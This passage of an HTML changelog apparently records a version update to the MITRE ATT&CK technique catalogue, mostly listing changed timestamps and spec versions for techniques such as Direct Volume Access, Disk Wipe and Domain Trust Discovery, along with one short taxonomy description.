+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">may&nbsp;bypass&nbsp;Windows&nbsp;file&nbsp;access&nbsp;controls&nbsp;as&nbsp;well&nbsp;as&nbsp;file&nbsp;syst</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">may&nbsp;bypass&nbsp;Windows&nbsp;file&nbsp;access&nbsp;controls&nbsp;as&nbsp;well&nbsp;as&nbsp;file&nbsp;syst</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">em&nbsp;monitoring&nbsp;tools.<span class="diff_sub">&nbsp;</span>(Citation:&nbsp;Hakobyan&nbsp;2009)&nbsp;&nbsp;Utilities,&nbsp;s</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">em&nbsp;monitoring&nbsp;tools.(Citation:&nbsp;Hakobyan&nbsp;2009)&nbsp;&nbsp;Utilities,&nbsp;su</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">uch&nbsp;as&nbsp;`NinjaCopy`,&nbsp;exist&nbsp;to&nbsp;perform&nbsp;these&nbsp;actions&nbsp;in&nbsp;PowerS</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ch&nbsp;as&nbsp;`NinjaCopy`,&nbsp;exist&nbsp;to&nbsp;perform&nbsp;these&nbsp;actions&nbsp;in&nbsp;PowerSh</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">hell.(Citation:&nbsp;Github&nbsp;PowerSploit&nbsp;Ninjacopy)&nbsp;Adversaries&nbsp;ma</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ell.(Citation:&nbsp;Github&nbsp;PowerSploit&nbsp;Ninjacopy)&nbsp;Adversaries&nbsp;may</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">y&nbsp;also&nbsp;use&nbsp;built-in&nbsp;or&nbsp;third-party&nbsp;utilities&nbsp;(such&nbsp;as&nbsp;`vssad</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;also&nbsp;use&nbsp;built-in&nbsp;or&nbsp;third-party&nbsp;utilities&nbsp;(such&nbsp;as&nbsp;`vssadm</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">min`,&nbsp;`wbadmin`,&nbsp;and&nbsp;[esentutl](https://attack.mitre.org/sof</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">in`,&nbsp;`wbadmin`,&nbsp;and&nbsp;[esentutl](https://attack.mitre.org/soft</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">tware/S0404))&nbsp;to&nbsp;create&nbsp;shadow&nbsp;copies&nbsp;or&nbsp;backups&nbsp;of&nbsp;data&nbsp;fro</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ware/S0404))&nbsp;to&nbsp;create&nbsp;shadow&nbsp;copies&nbsp;or&nbsp;backups&nbsp;of&nbsp;data&nbsp;from</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">m&nbsp;system&nbsp;volumes.(Citation:&nbsp;LOLBAS&nbsp;Esentutl)</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;system&nbsp;volumes.(Citation:&nbsp;LOLBAS&nbsp;Esentutl)</td></tr>
+        </tbody>
+    </table><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:59:05.018000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>description</td><td style='border: 1px solid black;border-collapse: collapse;'>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
+
+Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</td><td style='border: 1px solid black;border-collapse: collapse;'>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.(Citation: Hakobyan 2009)
+
+Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)</td></tr></tbody></table></details><hr><h4>[T1600.002] Weaken Encryption: Disable Crypto Hardware</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.028000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.662000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.002] Disable or Modify Tools: Disable or Modify Cloud Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:42:27.748000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.004] Disable or Modify Tools: Disable or Modify Linux Audit System Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:42:49.357000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1686] Disable or Modify System Firewall</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:36:31.474000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1685] Disable or Modify Tools</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:39:46.202000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.712000+00:00</td></tr></tbody></table></details><hr><h4>[T1685.001] Disable or Modify Tools: Disable or Modify Windows Event Log</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:43:20.588000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1561.001] Disk Wipe: Disk Content Wipe</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:38.983000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1561.002] Disk Wipe: Disk Structure Wipe</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:22.482000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1087.002] Account Discovery: Domain Account</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:31.050000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1078.002] Valid Accounts: Domain Accounts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:50:57.880000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.001] Modify Authentication Process: Domain Controller Authentication</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.091000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1568.002] Dynamic Resolution: Domain Generation Algorithms</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:25.458000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1069.002] Permission Groups Discovery: Domain Groups</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:33.946000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1482] Domain Trust Discovery</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:58.061000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1484] Domain or Tenant Policy Modification</h4><p><b>Current version</b>: 4.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.114000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1583.001] Acquire Infrastructure: Domains</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:42.246000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1584.001] Compromise Infrastructure: Domains</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:38.448000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1036.007] Masquerading: Double File Extension</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:33:07.592000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1689] Downgrade Attack</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:44:42.756000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1601.002] Modify System Image: Downgrade System Image</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.109000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.004] Hijack Execution Flow: Dylib Hijacking</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:58:27.104000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.007] Obfuscated Files or Information: Dynamic API Resolution</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:17:50.411000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:57:21.530000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr></tbody></table></details><hr><h4>[T1568] Dynamic Resolution</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:00.128000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.644000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1055.001] Process Injection: Dynamic-link Library Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:26:57.009000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.015] System Binary Proxy Execution: Electron Applications</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 18:01:23.195000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T1548.004] Abuse Elevation Control Mechanism: Elevated Execution with Prompt</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:51:53.527000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1586.002] Compromise Accounts: Email Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:41.309000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1585.002] Establish Accounts: Email Accounts</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:52.378000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1589.002] Gather Victim Identity Information: Email Addresses</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:54.336000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1564.008] Hide Artifacts: Email Hiding Rules</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:18:10.251000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1684.002] Social Engineering: Email Spoofing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:49:23.425000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.009] Obfuscated Files or Information: Embedded Payloads</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th 